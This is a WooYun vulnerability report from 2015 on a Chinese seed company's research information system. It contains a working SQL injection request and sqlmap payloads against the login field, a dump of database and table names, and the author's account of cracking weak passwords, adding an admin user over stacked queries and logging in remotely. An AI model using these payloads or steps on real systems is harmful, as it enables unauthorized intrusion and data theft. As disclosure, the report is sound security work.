当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158261

漏洞标题:北京奥瑞金种业公司存在高危SQL注入/弱口令(已远程登入主机,可内网渗透)

相关厂商:北京奥瑞金种业股份有限公司

漏洞作者: ㄚ冷的祝福

提交时间:2015-12-05 05:32

修复时间:2016-01-23 17:56

公开时间:2016-01-23 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-05: 细节已通知厂商并且等待厂商处理中
2015-12-09: 厂商已经确认,细节仅向厂商公开
2015-12-19: 细节向核心白帽子及相关领域专家公开
2015-12-29: 细节向普通白帽子公开
2016-01-08: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

北京奥瑞金种业股份有限公司,科研信息管理系统存在高危SQL注入+弱口令(已远程登入主机,可内网渗透)

详细说明:

**.**.**.**/Default.aspx



无意间逛到,看到输入栏就先给他一个单引号瞧瞧,结果出错啦,这下不打不行。


注入点在txt_username

POST /Default.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=vropc5nguuukihe5okukt145
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 263
__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMzU4ODAxNTM1ZGQwARHzAB%2FhEiHrBwMkWdgKlyBdnA%3D%3D&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWBAKZ4qjZDQK3u5vhBALy7cL8AgKM54rGBqyW1EDXsoog9U7coTHVz7kTZHhW&txt_username=test&txt_password=aa&Button1=%E7%99%BB%E5%BD%95


基本上没什么阻挡,那就直接上SQLMap吧,只有找出error-based跟AND/OR time-based blind。

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txt_username (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJMzU4ODAxNTM1ZGQwARHzAB/hEiHrBwMkWdgKlyBdnA==&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBAKZ4qjZDQK3u5vhBALy7cL8AgKM54rGBqyW1EDXsoog9U7coTHVz7kTZHhW&txt_username=admin' AND 1891=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (1891=1891) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113))) AND 'smgw'='smgw&txt_password=aaa&Button1=%E7%99%BB%E5%BD%95
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUJMzU4ODAxNTM1ZGQwARHzAB/hEiHrBwMkWdgKlyBdnA==&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWBAKZ4qjZDQK3u5vhBALy7cL8AgKM54rGBqyW1EDXsoog9U7coTHVz7kTZHhW&txt_username=admin' OR 5269=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'JWRK'='JWRK&txt_password=aaa&Button1=%E7%99%BB%E5%BD%95
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [6]:
[*] master
[*] model
[*] msdb
[*] ORIGINYANFA
[*] tempdb
[*] TORIGINYANFA
Database: TORIGINYANFA
[12 tables]
+-----------------+
| TGBreedL        |
| TGCHECKL        |
| TGFIELDL        |
| TGLISTL         |
| TGPCL           |
| TGPROJECTM      |
| TGSSRL          |
| TGSelfL         |
| TGT0L           |
| TGTABLE         |
| TGTESTL         |
| TGZTL           |
+-----------------+
Database: ORIGINYANFA
[55 tables]
+-----------------+
| Analyze         |
| AnalyzeImage    |
| AppTotal        |
| AppTsum         |
| Application     |
| BCTestL         |
| BSTestL         |
| BaseBreedC      |
| BaseBreedL      |
| BaseBreedT      |
| BaseGroupL      |
| Blog            |
| BreedChange     |
| BreedInfo       |
| BreedInfoTmp    |
| CTestL          |
| CTestplan       |
| CrossL          |
| DTestL          |
| DerivationLF    |
| Detail          |
| Dictionary      |
| Dictionary2     |
| DuizhaoL        |
| EC              |
| FST             |
| FSTestL         |
| FSTesterL       |
| Farming         |
| GroupL          |
| HPTestL         |
| ISelfL          |
| MA              |
| MAP             |
| NJTestL         |
| PRTestL         |
| Promission      |
| RTestL          |
| Result          |
| SeedDetail      |
| SeedOutL        |
| SeedResourceL   |
| SelfingImageL   |
| SelfingL        |
| SiteEnvironment |
| SiteInfo        |
| Systemrizhi     |
| TCTestL         |
| TestBreedL      |
| TestInfo        |
| UserInfo        |
| UserPromission  |
| Vi_TestResult   |
| WaiyinL         |
| Weather         |
+-----------------+


捞下系统用户密码表


密码字段是MD5 hash,搜寻下其中有几个弱密码,直接登进系统瞧瞧

看到这些密密麻麻的农作实验数据,为研究人员致上敬意
再来修改下SQLMap配置,让它侦测出stacked queries,就能玩更好玩的,
新增一个tthhcc/8i!kmnju76使用者,并添加到管理群组(测试完成已自行移除账号)。


接着远程进去



到这吧…不测了 这个网段上有个10多台Server,其中还有阿哥汇、士惠农业主机!!!

漏洞证明:


修复方案:

过滤
让防火墙起点作用
不要使用高权限数据库账号

版权声明:转载请注明来源 ㄚ冷的祝福@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-09 18:05

厂商回复:

CNVD未直接复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无